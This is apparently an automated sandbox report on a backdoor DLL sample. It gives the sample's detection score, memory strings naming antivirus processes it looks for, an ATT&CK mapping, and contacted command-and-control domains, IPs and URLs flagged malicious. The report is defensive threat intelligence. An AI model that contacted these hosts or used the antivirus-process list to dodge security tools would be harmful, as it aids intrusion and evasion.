    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avguard.exe
    Source: rundll32.exe, 00000007.00000003.2335770527.000001F583DD7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DD7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2333913914.000001F583DC1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239256609.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371707051.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164057570.0000025BF012D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: cpf.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D6E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVuser.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pctsTray.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935104556.0000025BF00DE000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ccprovsp.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VRFWSVC.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KVMonXP.kxp
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521925258.0000025BF009A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E0000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCANWSCS.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VRMONNT.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521925258.0000025BF009A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE267000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SPYBOTSD.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ClamWin.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FProtTray.exe
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD94641730 accept,WSAGetLastError,closesocket,bind,WSAGetLastError,closesocket,6_2_00007FFD94641730

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts611
    Windows Management Instrumentation    		1
    DLL Side-Loading    		111
    Process Injection    		1
    Disable or Modify Tools    		OS Credential Dumping1
    System Time Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		131
    Virtualization/Sandbox Evasion    		LSASS Memory831
    Security Software Discovery    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
    Process Injection    		Security Account Manager131
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS113
    System Information Discovery    		Distributed Component Object ModelInput Capture4
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Rundll32    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578327 Sample: 8N8j6QojHn.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 96 26 d2np1vqkcxhde6.cloudfront.net 2->26 28 o4508128816857088.ingest.de.sentry.io 2->28 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected AntiVM3 2->42 8 loaddll64.exe 1 2->8         started        signatures3 process4 process5 10 rundll32.exe 8->10         started        13 rundll32.exe 8->13         started        16 rundll32.exe 8->16         started        18 5 other processes 8->18 dnsIp6 44 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 10->44 46 Queries voltage information (via WMI often done to detect virtual machines) 10->46 48 Queries memory information (via WMI often done to detect virtual machines) 10->48 54 3 other signatures 10->54 30 195.133.1.117, 49785, 49821, 49856 MTW-ASRU Russian Federation 13->30 32 13.227.9.48, 49909, 49945, 49976 AMAZON-02US United States 13->32 34 o4508128816857088.ingest.de.sentry.io 34.120.62.213, 443, 49769, 49933 GOOGLEUS United States 13->34 50 System process connects to network (likely due to code injection or exploit) 13->50 52 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->52 36 d2np1vqkcxhde6.cloudfront.net 13.227.9.174, 49747, 49758, 49802 AMAZON-02US United States 16->36 38 127.0.0.1 unknown unknown 16->38 20 WerFault.exe 23 16 18->20         started        22 WerFault.exe 16 18->22         started        24 rundll32.exe 18->24         started        signatures7 process8

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    8N8j6QojHn.dll55%ReversingLabsWin64.Backdoor.Bastdoor

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    d2np1vqkcxhde6.cloudfront.net
    		13.227.9.174
    		truetrue
      		unknown
      o4508128816857088.ingest.de.sentry.io
      		34.120.62.213
      		truefalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://d2np1vqkcxhde6.cloudfront.net/wstrue
          		unknown
          http://195.133.1.117/wstrue
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE1F8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/drundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://docs.sentry.io/product/accounts/quotas/rundll32.exe, 0000000D.00000002.3521988705.0000025BF00BB000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF00AF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF00AF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521988705.0000025BF009D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF00AF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387123364.0000025BF00AF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461769420.0000025BF009B000.00000004.00000001.00020000.00000000.sdmpfalse
                  		unknown
                  http://upx.sf.netAmcache.hve.10.drfalse
                    		high
                    https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/Serundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/dllrundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/erundll32.exe, 00000007.00000002.2372761198.000001F583D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://docs.rs/getrandom#nodejs-es-module-supportrundll32.exe, 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2373403680.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.2471395632.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.3522600692.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, 8N8j6QojHn.dllfalse
                            		high
                            https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/e.mui?rundll32.exe, 00000007.00000002.2372761198.000001F583D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              34.120.62.213
                              		o4508128816857088.ingest.de.sentry.ioUnited States
                              		15169GOOGLEUSfalse
                              195.133.1.117
                              		unknownRussian Federation
                              		48347MTW-ASRUtrue
                              13.227.9.174
                              		d2np1vqkcxhde6.cloudfront.netUnited States
                              		16509AMAZON-02UStrue
                              13.227.9.48
                              		unknownUnited States
                              		16509AMAZON-02UStrue

                              Private

                              IP
                              127.0.0.1

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1578327
                              Start date and time:2024-12-19 15:32:17 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 55s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:18
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:8N8j6QojHn.dll
                              (renamed file extension from exe to dll, renamed because original name is a hash value)
                              Original Sample Name:6ad0ec9ca2464af8c9cddf6d8959850c7e106f2f.dll.exe
                              Detection:MAL
                              Classification:mal96.evad.winDLL@22/9@3/5
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:Failed

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.63, 20.231.128.67, 4.245.163.56
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: 8N8j6QojHn.dll

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              09:33:37API Interceptor1x Sleep call for process: loaddll64.exe modified
                              09:33:41API Interceptor2x Sleep call for process: WerFault.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              MTW-ASRUET5.exeGet hashmaliciousUnknownBrowse
                              • 45.141.101.45
                              la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                              • 193.124.107.252
                              na.elfGet hashmaliciousUnknownBrowse
                              • 193.124.64.114
                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                              • 193.124.64.126
                              g082Q9DajU.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog StealerBrowse
                              • 195.133.48.136
                              file.exeGet hashmaliciousLummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                              • 195.133.48.136
                              Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                              • 195.133.48.136
                              SecuriteInfo.com.Win32.TrojanX-gen.12944.32631.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                              • 195.133.48.136
                              https://t.co/Tmh47fiTWdGet hashmaliciousUnknownBrowse
                              • 93.95.97.29
                              PQ2AUndsdb.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                              • 195.133.48.136
                              AMAZON-02UShttps://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                              • 3.77.62.172
                              setup.msiGet hashmaliciousAteraAgentBrowse
                              • 108.158.75.12
                              powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 18.180.43.133
                              sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 34.212.245.104
                              Last Annual payment.htmGet hashmaliciousPhisherBrowse
                              • 52.16.219.193
                              arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 3.6.240.229
                              arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 13.61.42.195
                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 54.245.29.89
                              RECOUVREMENT -FACTURER1184521.pdfGet hashmaliciousUnknownBrowse
                              • 13.226.2.54
                              QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                              • 3.124.142.205
                              AMAZON-02UShttps://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                              • 3.77.62.172
